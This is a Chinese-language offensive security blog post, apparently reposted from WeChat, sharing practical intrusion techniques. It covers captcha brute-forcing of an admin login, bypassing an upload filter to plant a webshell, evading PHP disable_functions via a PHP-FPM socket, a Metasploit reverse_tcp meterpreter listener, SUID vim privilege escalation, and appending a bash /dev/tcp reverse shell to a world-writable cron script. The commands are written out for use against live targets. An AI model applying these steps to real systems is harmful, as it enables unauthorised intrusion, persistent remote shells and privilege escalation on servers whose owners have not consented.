实战技巧分享

admin 2024年4月28日08:28:05评论8 views字数 1969阅读6分33秒阅读模式

1、后台验证码爆破

实战技巧分享

可以看到是有验证码的,也不存在验证码无限爆破漏洞只能使用burp插件验证码识别

1、首先是下载插件

captcha-killer-modified

2、获取验证码

实战技巧分享

获取一下,看看有没有获取上

实战技巧分享

3、开启python脚本

实战技巧分享

4、配置爆破

实战技巧分享
实战技巧分享
实战技巧分享

2、getshell 几种方式

1、用无影响的

实战技巧分享

直接访问上传的webshell

实战技巧分享

bypass disable_function

返回ret=127代表函数禁用需要bypasshttps://www.anquanke.com/post/id/208451

实战技巧分享

案例解析

文件上传点开启我们的 Burp, 进行拦截发包, 经过测试发现只能上传 .jpg 文件, 此时我们需要绕过后端过滤, 经过查询后发现修改文件幻数就可以绕过检测

实战技巧分享

我们来访问我们的文件可以发现获取到 SHELL 但是马上关闭, 我们查看房间, 了解到需要做一些规避

首先根据提示内容, 我们需要先找到对应服务器的路径, 在目录遍历时, 我们发现了一个 phpinfo() 在此我们可以找到对于服务器路径

实战技巧分享

思路打开

既然上传文件后无法长时间存活,那么就可以反弹shell,或者在能执行命令的这段时间反弹shell到msf上

就比如蚁剑我使用插件bypass后,虽然能执行命令,但不到一分钟就又不能执行了,这个时候我的想法就是把shell反弹到msf上,顺便还能跑一下自带的提权

运维人员会禁用 PHP 的一些 “危险” 函数,将其写在 php.ini 配置文件中,就是我们所说的 disable_functions 了。

实战技巧分享

这函数禁用的真死,用php木马反弹shell肯定是不行了

实战技巧分享

proc _ open ()已被禁用

只能上传msf木马反弹监听了在VPN上直接安装msf,省的搭建代理了而且是低权限只能先msf,再提权了

php-fpm是PHP内置的一种fast-cgi

php-fpm即php-Fastcgi Process Manager.php-fpm是 FastCGI 的实现,并提供了进程管理的功能。进程包含 master 进程和 worker 进程两种进程。master 进程只有一个,负责监听端口,接收来自 Web Server 的请求,而 worker 进程则一般有多个(具体数量根据实际需要配置),每个进程内部都嵌入了一个 PHP 解释器,是 PHP 代码真正执行的地方。

实战技巧分享

看到这里可以看到PHP-FPM找到tmp目录下的进行绕过.antproxy.php

/tmp/php-cgi-54.sock

实战技巧分享

有时候没成功,可能是php路径有问题通常在

`/usr/local/bin/php` 或 `/usr/bin/php`

实战技巧分享

vps搭建msf

安装msf

curl [https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb](https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb) > msfinstall && chmod 755 msfinstall && ./msfinstall

2.安装postgresql供msf使用

sudo apt install postgresql

3.测试查看数据库状态

systemctl status postgresql

设置数据开机自启动systemctl enable postgresql启动msfmsfconsole

设置监听器

msf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost VPS-IPexploit or run

实战技巧分享

成功获取

实战技巧分享

suid 提权

查找拥有 suid 权限的文件

find / -perm /4000 2>/dev/null

实战技巧分享

vim 命令提权

https://gtfobins.github.io/gtfobins/vim/#suid

实战技巧分享

/usr/bin/vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

没有成功

旁门左道提权

计划任务提权查找 777 权限文件

find / -perm 777 -type f

实战技巧分享
实战技巧分享

写入反弹 shell ip 端口自行修改

echo "bash -i >& /dev/tcp/you-vps/10086 0>&1" >> /tmp/hackme.sh

实战技巧分享

原文始发于微信公众号(迪哥讲事):实战技巧分享

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月28日08:28:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战技巧分享https://cn-sec.com/archives/2693324.html

发表评论

匿名网友 填写信息